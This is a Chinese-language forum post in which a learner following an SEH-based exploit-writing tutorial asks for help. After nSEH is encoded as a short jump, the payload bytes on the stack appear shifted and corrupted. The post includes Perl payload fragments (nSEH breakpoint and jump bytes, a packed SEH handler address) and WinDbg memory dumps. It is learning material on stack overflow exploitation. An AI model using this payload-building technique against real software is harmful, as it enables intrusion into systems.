我在学习Exploit编写教程3b时遇到了一个奇怪的问题
1.在将nseh编码为跳转指令之前:(此时用\xcc中断,下面的调试信息一切正常)
my $nseh="\xcc\xcc\xcc\xcc"; #breakpoint, sploit should stop here
my $seh=pack('V',0x1002083D);#SEH handler地址
0:000> d 0012fb7c
0012fb7c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012fb8c
cc cc cc cc 3d 08 02 10-52 52 52 52 52 52 52 52 ....=...RRRRRRRR
0012fb9c 52 52 52 52 52 52 52 52-00 00 00 00 52 52 52 52 RRRRRRRR....RRRR
0012fbac cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbbc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbcc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbdc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbec cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0:000> d eip
0012fb8c
cc cc cc cc 3d 08 02 10-52 52 52 52 52 52 52 52 ....=...RRRRRRRR
0012fb9c 52 52 52 52 52 52 52 52-00 00 00 00 52 52 52 52 RRRRRRRR....RRRR
0012fbac cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbbc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbcc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbdc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbec cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
0012fbfc cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................
2.将nseh编码为 jmp 30个字节后(调试信息中问题出现了)
my $nseh="\xeb\x1e\xcc\xcc"; #breakpoint, sploit should stop here
my $seh=pack('V',0x1002083D); #SEH handler地址
0:000> d 0012fb7c
0012fb7c 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0012fb8c
3f cc cc 3d 08 02 10 52-52 52 52 52 52 52 52 52 ?..=...RRRRRRRRR
0012fb9c 52 52 52 52 52 52 52 52-00 00 00 00 52 52 52 cc RRRRRRRR....RRR.
0012fbac cc cc cc cc cc cc cc cc - cc cc cc cc cc cc cc cc ................
0012fbbc cc cc cc cc cc cc cc cc - cc cc cc cc cc cc cc cc ................
0012fbcc cc cc cc cc cc cc cc cc - cc cc cc cc cc cc cc cc ................
0012fbdc cc cc cc cc cc cc cc cc - cc cc cc cc cc cc cc cc ................
0012fbec cc cc cc cc cc cc cc cc - cc cc cc cc cc cc cc cc ................
0:000> d 0012fb8c
0012fb8c
3f cc cc 3d 08 02 10 52-52 52 52 52 52 52 52 52 ?..=...RRRRRRRRR
0012fb9c 52 52 52 52 52 52 52 52-00 00 00 00 52 52 52 cc RRRRRRRR....RRR.
0012fbac cc cc cc cc cc cc cc cc - cc cc cc cc cc cc cc cc ................
0012fbbc cc cc cc cc cc cc cc cc - cc cc cc cc cc cc cc cc ................
0012fbcc cc cc cc cc cc cc cc cc - cc cc cc cc cc cc cc cc ................
0012fbdc cc cc cc cc cc cc cc cc - cc cc cc cc cc cc cc cc ................
0012fbec cc cc cc cc cc cc cc cc - cc cc cc cc cc cc cc cc ................
0012fbfc cc cc cc cc cc cc cc cc - cc cc cc cc cc cc cc cc ................
将nseh编码为jmp指令之后,从0012fb8c开始以后的内容整体向前移动了一个字节,而且前面的字节被更改了。这使得在出现异常时无法跳到dll中的pop/pop/ret那里去。后来我使用教程中给的shellcode,发现也是同样的问题。
请各位高手帮帮忙啊。
[课程]Android-CTF解题方法汇总!